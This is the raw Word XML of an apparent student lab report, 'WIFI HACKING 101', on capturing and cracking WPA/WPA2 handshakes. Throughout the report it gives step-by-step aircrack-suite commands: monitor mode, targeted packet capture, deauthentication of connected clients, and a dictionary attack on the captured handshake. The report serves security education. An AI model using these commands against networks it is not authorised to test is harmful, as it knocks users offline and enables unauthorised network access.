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9A27" w14:textId="5A7379AC" w:rsidR="003068E1" w:rsidRPr="00885E6D" w:rsidRDefault="00885E6D" w:rsidP="00885E6D"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22070123</w:t>
      </w:r>
      <w:r w:rsidR="003068E1">
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D54894" w14:textId="7092A010"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WIFI HACKING 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82B22A" w14:textId="316ADA84" w:rsidR="001D65CB" w:rsidRDefault="00885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DD896" wp14:editId="493DC64D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B18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652F61C4" w14:textId="77777777" w:rsidR="00885E6D" w:rsidRPr="00885E6D" w:rsidRDefault="00885E6D" w:rsidP="00885E6D"/>
    <w:p w14:paraId="4AF57B73" w14:textId="0852BBCC"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468DBC73" w14:textId="77777777" w:rsidR="00885E6D" w:rsidRPr="00885E6D" w:rsidRDefault="00885E6D" w:rsidP="00885E6D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00885E6D">
        <w:t>To learn the fundamentals of WiFi security and practice capturing and cracking WPA/WPA2 handshakes using tools like aircrack-ng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE7C40" w14:textId="5A13CF7F"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55E17166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Enable monitor mode on the wireless interface using airmon-ng start wlan0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C84134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Scan for available WiFi networks using airodump-ng wlan0mon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A37FD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14:paraId="58C2C56B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Start capturing packets on the target channel with airodump-ng --bssid [BSSID] -c [channel] -w capture wlan0mon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431C71E9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Send deauthentication packets using aireplay-ng --deauth 10 -a [BSSID] wlan0mon to force a client to reconnect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354AE1E5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Once the handshake is captured, use aircrack-ng -w [wordlist.txt] capture-01.cap to attempt password cracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B501F67" w14:textId="49C1101B"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14:paraId="1F803A45" w14:textId="757436B7"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14:paraId="15483E43" w14:textId="77777777"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>Note the SSID (network name), BSSID (MAC address of the AP), and channel using airodump-ng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8957F9" w14:textId="70FC5EDC"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14:paraId="2300B7D0" w14:textId="77777777"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>Use airmon-ng start wlan0 to enable monitor mode on your wireless adapter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D985D8F" w14:textId="2DC4FDAF"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14:paraId="094A1D3B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>Run airodump-ng --bssid [BSSID] -c [channel] -w capture wlan0mon to monitor and capture handshake packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5011A8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lastRenderedPageBreak/>
        <w:t>Deauthenticate a connected client to force a handshake using aireplay-ng --deauth 5 -a [BSSID] wlan0mon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C26732" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>  Crack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t xml:space="preserve"> the Captured Handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FDCB18" w14:textId="77777777"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>Use aircrack-ng -w [wordlist.txt] capture-01.cap to perform a dictionary attack using the ESSID as salt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657332B" w14:textId="77777777"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136A8FD5" w14:textId="3F2C6CD0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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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 wp14:anchorId="1CF55386" wp14:editId="707D58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3E223520" w14:textId="4C64AA65"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airmon-ng start wlan0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415CE591" w14:textId="403082B4"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WiFi networks using airodump-ng wlan0mon and note down the BSSID and channel of the target network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFB675" w14:textId="18426756"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14:paraId="5867649E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118BF17F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0BC3E6C" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>airodump-ng --bssid [BSSID] -c [channel] -w capture wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B3924C" w14:textId="2322FE40" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t xml:space="preserve"> Deauthenticate a connected device to force a handshake by running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54003803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2771B318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FF057B1" w14:textId="77777777" w:rsidR="00CC4BA1" w:rsidRPr="00CC4BA1" w:rsidRDefault="00CC4BA1" w:rsidP="00CC4BA1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>aireplay-ng --deauth 5 -a [BSSID] wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5260EF13" w14:textId="46831E91"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14:paraId="4D9B55E5" w14:textId="188655A3"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900CB4" wp14:editId="353E3D52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12B943" wp14:editId="54975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5A85" w14:textId="4B63A468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CC4BA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AirCrack-ng-LET’S GET CRACKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76398C77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14:paraId="18CE9C9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 w14:paraId="495AA506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14:paraId="3579B2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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>11:FF</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC4BA1">
        <w:t>:D9:BD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B9BC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14:paraId="28A2BAE7" w14:textId="16553F5E"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6CC8A6" wp14:editId="1731373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2A5" w14:textId="77777777" w:rsidR="00F87CC5" w:rsidRDefault="00F87CC5" w:rsidP="00F87CC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08506023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16DCC65B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0BD8E0F5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AA600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A41EBA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44467131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D8E71C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D099B4A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D7A5568" w14:textId="08270C25"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14:paraId="492B3B0A" w14:textId="77777777" w:rsidR="00F87CC5" w:rsidRPr="00F87CC5" w:rsidRDefault="00F87CC5" w:rsidP="00F87CC5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2430"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00F87CC5">
        <w:t>Successfully captured a WPA handshake and demonstrated cracking the password using a dictionary attack, highlighting the importance of strong WiFi passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165CB80F" w14:textId="1A84DAAF"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3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="579482398">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1980301969">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2078819636">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="147803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D"/>
    <w:rsid w:val="001D65CB"/>
    <w:rsid w:val="003068E1"/>
    <w:rsid w:val="00610DAD"/>
    <w:rsid w:val="00654C37"/>
    <w:rsid w:val="007E20B2"/>
    <w:rsid w:val="00885E6D"/>
    <w:rsid w:val="00A003DB"/>
    <w:rsid w:val="00CC4BA1"/>
    <w:rsid w:val="00D552D7"/>
    <w:rsid w:val="00D77FD5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545"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B50C0414-D4ED-4A71-A972-9200A46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Ruben Raj</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-29T16:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-08T14:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>